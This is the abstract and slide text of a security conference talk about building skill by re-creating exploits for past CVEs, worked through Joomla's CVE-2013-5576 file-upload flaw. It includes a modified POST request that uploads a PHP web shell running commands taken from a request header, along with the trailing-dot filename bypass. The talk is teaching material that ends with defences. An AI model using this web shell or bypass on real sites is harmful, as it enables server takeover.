Abstract: In order to improve our skills, we can revisit past CVEs and create our own exploits, and compare with existing exploits. By practicing in this manner, we can eventually contribute to the wider security community. The part of this exercise that is the most useful is when we find a difference with our own developed exploit compared against a current existing exploit. We must practice our critical thinking skills to determine the discrepancies, and determine if any unstated assumptions exist. This talk will consist of looking at a specific CVE (CVE-2013-5576) to explain: The general strategy and thought process for practicing by revisiting past CVEs; The vulnerability, its context, and why the code that is responsible for the functionality produces the vulnerability.; A technique for determining the code responsible for the vulnerability.; The differences found when running a current known exploit against the vulnerability, and the debugging methods used.; The differences between our developed exploit and a current known exploit.
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
1. Climbing the InfoSec Skill Tree Image courtesy of Wikipedia
Climb the infosec skill
tree by revisiting past
CVEs
Sandra Escandor-O’Keefe
Security Engineer at Fastly
s3scand0r
2. Climbing the InfoSec Skill Tree
● What’s In It For You?
● A Suggested Strategy
● Fundamental Concept Trees
● CVE-2013-5576 As Example
● Revisiting Ideas Related to CVE
● Conclusion
Talk Outline
3. Climbing the InfoSec Skill Tree
Motivation
From: Andreas Vesalius' Fabrica, published in 1543
There’s more problems to solve in
information security than there are
people to solve them.
We need a continuous source of
fresh brains to solve these
problems
4. Climbing the InfoSec Skill Tree
● Major benefit: Helps you to look at
concepts with fresh eyes
● Structuring a mentorship relationship is a
challenge
○ This talk can help you get an idea of how to
structure such a relationship
For (Potential) Mentors
5. Climbing the InfoSec Skill Tree
Skill Builder sees:
● Path is hazy
● A CVE, but how was
reasoning developed?
For Skill Builders
This way leads to technical
mastery
7. Climbing the InfoSec Skill Tree
● Reproduction leads to deeper
understanding:
○ The system where vulnerability lies
○ Vulnerability and why it’s there
○ Where does system tend to be vulnerable?
○ Technical fundamental concepts
Motivation for the Skill Builder
8. Climbing the InfoSec Skill Tree
● Inspired by “How to Read a Paper” by
S.Keshav
○ Three pass approach to research paper
reading
● CVE findings are essentially research
findings but they may or may not have
formal paper associated with them
General Strategy
9. Climbing the InfoSec Skill Tree
● First pass: Quick glance
● Second pass:
○ Set up a test environment
○ Get feel for structure of segment of
vulnerable code
● Third pass: Look at the details
General Approach
10. Climbing the InfoSec Skill Tree
Ask:
● What tools do you think were used to find the
vulnerability?
● What are the fundamental concepts related to this
vulnerability? (i.e, client-server architecture;
communication protocol specifics, like HTTP)
● How would you classify this vulnerability?
● How would you set up a test environment?
First Pass
11. Climbing the InfoSec Skill Tree
Examine, but not in too much detail:
● Diff of fix vs. vulnerable code
○ Get feel for structure of surrounding code where
vulnerability exists
● Set up a test environment
Second Pass
12. Climbing the InfoSec Skill Tree
● Attempt to hit vulnerability w/o using
existing exploit
○ Manual experimentation?
○ Write a script?
○ Other existing tools? (e.g tamper data)
● Think about why vulnerability exists
● Create Fundamental Concepts Tree
Third Pass
13. Climbing the InfoSec Skill Tree
● Run current existing exploit afterwards
● If running current existing exploit was not
smooth, debug until it runs well
○ Make notes of what you needed to change
○ Equivalent to Keshav’s “You should
identify and challenge every
assumption in every statement”
Third Pass cont’d
14. Climbing the InfoSec Skill Tree
Borrowing from Sid
Meier’s Alpha Centauri:
Create a fundamental
concepts tree
Third Pass cont’d.
15. Climbing the InfoSec Skill Tree
Fundamental Concepts Tree
CVE-2013-5576
Client-Server
Model
HTTP
Headers
HTTP
Protocol
OSI
Model
Input
Validation
Vulnerabilitie
s
Arbitrary
Code
Execution
Absolute
and Relative
Pathnames
File
System
Structure
File System
Permissions
Arbitrary
File
Uploads
16. Climbing the InfoSec Skill Tree
Allows us to:
● Reflect on what we learned
○ Where do we lack understanding?
● Help others learn
Fundamental Concepts Trees
17. Climbing the InfoSec Skill Tree
● Bug reported to Joomla! by Verasafe
● Joomla Media Manager component vuln.
● Arbitrary file upload vulnerability
● Results in arbitrary code execution
● Affected: Joomla 2.5.x up to 2.5.13, as
well as 3.x up to 3.1.4 versions
Introducing CVE-2013-5576
18. Climbing the InfoSec Skill Tree
After first pass, what did I do?
● Created test environment
● Diff vulnerable code with Fixed code
● Manual test for vulnerability w/o original
exploit
● Examined what makes the code vulnerable
● Examined original exploit in detail
CVE-2013-5576 as Example
19. Climbing the InfoSec Skill Tree
Test Environment Details
● On VM: Ubuntu 64-bit 12.04.5 (Ubuntu
Precise)
● PHP 5.3.10-1ubuntu3.26
● Apache 2.2.22 (Ubuntu)
● Followed installation instructions for
Joomla 3.1.4 Stable (Ember)
CVE-2013-5576 as Example, cont’d.
20. Climbing the InfoSec Skill Tree
CVE-2013-5576 as Example, cont’d.
Vulnerable Code Fixed Code
if (!in_array($format, $allowable) && !in_array($format,
$ignored))
if ($format == '' || $format == false ||
(!in_array($format, $allowable) && !in_array($format,
$ignored)))
$format = strtolower(JFile::getExt($file[‘name’]));
…
if (!in_array($format, $allowable) && !in_array($format, $ignored)){
return false; //Not allowed to upload file
}
Vulnerable Code (snippet of canUpload(..)):
Fix: Extra condition added
Key condition: If this
is true, then upload
is NOT allowed
If filename extension is not in $allowable AND if filename
extension is not in $ignored, then don’t allow upload
21. Climbing the InfoSec Skill Tree
● Used Tamper Data browser plugin
● Modified filename passed to server by
experimenting
○ Based on filename strings that I’ve seen
before that cause issues, i.e) “*.*”, “.*”, etc.
○ Watch response behavior
CVE-2013-5576 Manual Testing
22. Climbing the InfoSec Skill Tree
CVE-2013-5576 Manual Testing,
cont’d
Original POST data (regular request) New POST data
-----------------------------
112817922114815867397460213rnContent-
Disposition: form-data; name="Filedata[]";
filename="shell.php"rnContent-Type: application/x-
phprnrn<?phpnsystem($_SERVER['HTTP_ACCEP
T_LANGUAGE']);n?>nrn-----------------------------
112817922114815867397460213rnContent-
Disposition: form-data; name="folder"rnrnrn----------
-------------------
112817922114815867397460213rnContent-
Disposition: form-data; name="return-
url"rnrnaW5kZXgucGhwP29wdGlvbj1jb21fbWVkaW
E=rn-----------------------------
112817922114815867397460213--rn
-----------------------------
112817922114815867397460213rnContent-
Disposition: form-data; name="Filedata[]";
filename="shell.php.*"rnContent-Type: application/x-
phprnrn<?phpnsystem($_SERVER['HTTP_ACCEP
T_LANGUAGE']);n?>nrn-----------------------------
112817922114815867397460213rnContent-
Disposition: form-data; name="folder"rnrnrn----------
-------------------
112817922114815867397460213rnContent-
Disposition: form-data; name="return-
url"rnrnaW5kZXgucGhwP29wdGlvbj1jb21fbWVkaW
E=rn-----------------------------
112817922114815867397460213--rn
“.*” added
here
Create an administrator type user, log in, and use the “Media Manager” option to upload a file.
Before uploading
the file, set
Tamper Data to
start the tamper.
23. Climbing the InfoSec Skill Tree
● We know that $format
is problematic (from
diffing fixed vs.
vulnerable code)
● Examine how $format
is generated, see JFile::getExt (in
libraries/joomla/filesystem/file.php)
Why Does Vulnerability Occur?
$format = strtolower(JFile::getExt($file[‘name’]));
…
If (!in_array($format, $allowable) &&
!in_array($format, $ignored)){
return false; //Not allowed to upload file
}
Vulnerable Code (snippet of canUpload(..)):
JFile::getExt($file)
{
$dot = strrpos($file, ‘.’) + 1;
return substr($file, $dot);
}
(snippet of getExt, called by canUpload(..)):
24. Climbing the InfoSec Skill Tree
What I initially assumed:
Why Does Vulnerability Occur? cont’d.
Tamper data
POST request
modified $file = “shell.php.*”
In JFile getExt:
$format = strtolower(JFile::getExt($file[‘name’]));
…
If (!in_array($format, $allowable) &&
!in_array($format, $ignored)){
return false; //Not allowed to upload file
}
Vulnerable Code (snippet of canUpload(..)):
JFile::getExt($file)
{
$dot = strrpos($file, ‘.’) + 1;
return substr($file, $dot);
}
(snippet of getExt, called in canUpload(..)):
0 1 2 3 4 5 6 7 8 9 10 11
s h e l l . p h p . * 0
For PHP’s substr, see: github.com/php/php-
src/blob/master/ext/standard/string.c
PHP’s substr should give back “*”
25. Climbing the InfoSec Skill Tree
In reality:
Why Does Vulnerability Occur? cont’d.
Use Tamper
data to modify
POST request $file = “shell.php.”
In JFile getExt:
ZSTR_LEN(str) = 9
f = 10 (this is $dot above)
Then the following condition is met:
If (f > (zend_long) ZSTR_LEN(str)){
RETURN_FALSE;
}
Working through PHP_FUNCTION(substr)
0 1 2 3 4 5 6 7 8 9 10
s h e l l . p h p . 0
For PHP’s substr, see: github.com/php/php-
src/blob/master/ext/standard/string.c
PHP’s substr returns FALSE
JFile::getExt($file)
{
$dot = strrpos($file, ‘.’) + 1;
return substr($file, $dot);
}
(snippet of getExt, called by canUpload(..)):
Joomla
Filename
cleanup
$file = “shell.php.”
$dot = 9 + 1 = 10
FALSE
returned
26. Climbing the InfoSec Skill Tree
Why Does Vulnerability Occur? cont’d.
$format = strtolower(JFile::getExt($file[‘name’]));
$allowable = explode(‘,’, $upload_extensions);
$ignored = explode(‘,’, $ignore_extensions);
If (!in_array($format, $allowable) &&
!in_array($format, $ignored)){
return false; //Not allowed to upload file
}
Vulnerable Code (snippet of canUpload(..)):
JFile::getExt($file)
{
$dot = strrpos($file, ‘.’) + 1;
return substr($file, $dot);
}
(snippet of getExt, called in canUpload(..)):
getExt returns FALSE => $format = ‘’ (empty str)
$allowable is an array of accepted file extensions.
!in_array($format, $allowable) => TRUE
(i.e extension is NOT allowed)
$ignored: Because textbox input is empty, after
explode, Array( [0]=> ) - it is an array with one
element with value of ‘’ therefore $format is in it.
!in_array($format, $ignored) => FALSE
(i.e our file extension can be allowed to pass
through
$ignored is an array of ext’s to let pass through.
Default install: $ignore_extensions empty str
TRUE && FALSE => FALSE :. File upload allowed
27. Climbing the InfoSec Skill Tree
In reality:
Why Does Vulnerability Occur? cont’d.
Use Tamper
data to modify
POST request $file = “shell.php.”
In JFile getExt:
0 1 2 3 4 5 6 7 8 9 10
s h e l l . p h p . 0
For PHP’s substr, see: github.com/php/php-
src/blob/master/ext/standard/string.c
Joomla
Filename
cleanup
JFile::makesafe filters out:
Any two or more
consecutive “.”
(i.e “..”, “...”)
(.){2,}
Any character
that is not
alphanumeric, a
“.”, a “_”, or a “-”,
or a single space
[^A-Za-z0-9.-_ ]
Any single “.” at
the beginning
^.
shell.php.* shell.php.
28. Climbing the InfoSec Skill Tree
Given findings of manual tests, initial PoC:
● Had trailing “.*”
○ Analysis of vuln afterwards showed this
trailing “*” was unnecessary (i.e, only trailing
“.” is needed for exploitation)
Comparing CVE-2013-5576 Exploits
29. Climbing the InfoSec Skill Tree
● Linux filenames are just a sequence of bytes that can’t
contain 0x00 or 0x2F (slash (‘/’))(Source:
http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_170)
○ Therefore, “webshell.php.” is a valid filename
● It’s worth exploring C source code of PHP, especially
for standard string functions, e.g substr, strrpos
○ We can miss a lot, esp. edge cases by only looking
at documentation
CVE-2013-5576 Takeaways
30. Climbing the InfoSec Skill Tree Image courtesy of Wikipedia
Some Additional Things To
Think About
31. Climbing the InfoSec Skill Tree
● LangSec - a defense method
○ Proposed by Meredith L. Patterson, Sergey
Bratus, and Dan Hirsch @ Brucon ‘12
○ Any processing of untrusted input should
have a formal language to define valid input
○ The input handler should be a “recognizer”
for that valid input
○ Big concept here: Finite State Machines
Revisiting Ideas Related to CVE
32. Climbing the InfoSec Skill Tree
Example: Only process binary number with
even number of 0s
Revisiting Ideas Related to CVE
Image By Cepheus - Own work, Public Domain, https://commons.wikimedia.org/w/index.php?curid=1234893
Input
Accept
State
Further processing
can safely be done
on data only if finite
state machine is in
accept state after
input processed
33. Climbing the InfoSec Skill Tree
What modifications can you make to
Joomla 3.1.4 in order to create a
recognizer for the Joomla Media Manager
component, such that it recognizes valid
filenames and only allows processing of
those?
Take-home Challenge
34. Climbing the InfoSec Skill Tree
● A suggested approach for the Skill
Builder
● Creating fundamental concept trees to
help you and others
● Showed an example thought process
through a CVE
● Revisited Ideas Related to CVE
Shown:
35. Climbing the InfoSec Skill Tree Image courtesy of Wikipedia
Thanks for listening